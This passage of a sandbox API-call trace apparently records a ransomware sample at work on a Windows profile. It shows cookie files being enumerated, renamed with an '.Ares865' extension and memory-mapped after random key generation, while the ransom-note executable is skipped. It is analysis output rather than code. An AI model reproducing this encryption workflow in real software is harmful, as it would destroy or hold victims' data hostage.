(lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cd3DxKiwLiAcvSM_\\1t27EyOo90bdWGY4\\PX-fVL.swf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cd3dxkiwliacvsm_\\1t27eyoo90bdwgy4\\px-fvl.swf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.401] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5462) returned 1 [0107.402] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.402] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.402] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.402] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1860, lpName=0x0) returned 0x124 [0107.402] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1860) returned 0x190000 [0107.403] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.404] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.404] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.405] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies" [0107.405] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt.Ares865") returned 79 [0107.405] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt.ares865"), dwFlags=0x1) returned 1 [0107.408] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.408] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=83) returned 1 [0107.409] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.409] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.409] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.409] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x360, lpName=0x0) returned 0x124 [0107.412] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x360) returned 0x190000 [0107.413] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.414] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.414] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.415] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt.Ares865") returned 79 [0107.415] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt.ares865"), dwFlags=0x1) returned 1 [0107.420] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.421] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=551) returned 1 [0107.421] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.421] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.422] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.422] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x530, lpName=0x0) returned 0x124 [0107.423] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x530) returned 0x190000 [0107.424] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.427] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.427] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.428] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt.Ares865") returned 80 [0107.428] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt.ares865"), dwFlags=0x1) returned 1 [0107.430] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.431] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=241) returned 1 [0107.431] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.432] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.432] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.432] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x400, lpName=0x0) returned 0x124 [0107.434] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x400) returned 0x190000 [0107.437] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.437] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.437] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.438] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt.Ares865") returned 84 [0107.438] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt.ares865"), dwFlags=0x1) returned 1 [0107.440] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.440] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=111) returned 1 [0107.441] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.441] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.441] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.442] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x370, lpName=0x0) returned 0x124 [0107.449] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x370) returned 0x190000 [0107.450] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.456] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.456] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.458] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt.Ares865") returned 85 [0107.458] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt.ares865"), dwFlags=0x1) returned 1 [0107.466] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.467] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=110) returned 1 [0107.468] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.471] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.471] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.473] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x370, lpName=0x0) returned 0x124 [0107.478] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x370) returned 0x190000 [0107.482] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.484] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.484] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.486] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt.Ares865") returned 80 [0107.487] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\5p5nrgjn0js_halpmcxz@google[2].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\5p5nrgjn0js_halpmcxz@google[2].txt.ares865"), dwFlags=0x1) returned 1 [0107.495] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\5p5nrgjn0js_halpmcxz@google[2].txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.497] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=276) returned 1 [0107.497] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.498] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.498] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.498] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x420, lpName=0x0) returned 0x124 [0107.500] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x420) returned 0x190000 [0107.500] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.501] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.501] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.502] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt.Ares865") returned 79 [0107.502] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt.ares865"), dwFlags=0x1) returned 1 [0107.504] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.504] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=86) returned 1 [0107.504] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.505] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.505] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.505] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x360, lpName=0x0) returned 0x124 [0107.509] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x360) returned 0x190000 [0107.512] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.513] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.513] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.513] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt.Ares865") returned 79 [0107.513] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt.ares865"), dwFlags=0x1) returned 1 [0107.515] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.516] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=414) returned 1 [0107.516] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.517] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.517] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.517] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4a0, lpName=0x0) returned 0x124 [0107.519] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4a0) returned 0x190000 [0107.520] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.520] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.520] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.521] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\index.dat.Ares865") returned 55 [0107.521] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\index.dat.ares865"), dwFlags=0x1) returned 0 [0107.521] GetLastError () returned 0x20 [0107.521] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\index.dat MoveFileEx error 32\r\n") returned 77 [0107.521] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\index.dat MoveFileEx error 32\r\n") returned 77 [0107.521] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0107.522] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x7687 [0107.522] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x4d, lpOverlapped=0x0) returned 1 [0107.522] CloseHandle (hObject=0x118) returned 1 [0107.522] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0107.522] CloseHandle (hObject=0x0) returned 0 [0107.522] CloseHandle (hObject=0x0) returned 0 [0107.522] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2bc9ae40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5011fae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5011fae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0107.523] lstrcmpiW (lpString1="Low", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0107.523] lstrcmpiW (lpString1="Low", lpString2="aoldtz.exe") returned 1 [0107.523] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low" [0107.523] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt.Ares865") returned 98 [0107.523] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt.ares865"), dwFlags=0x1) returned 1 [0107.525] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.525] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=102) returned 1 [0107.526] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.526] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.526] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.526] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x370, lpName=0x0) returned 0x124 [0107.528] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x370) returned 0x190000 [0107.529] 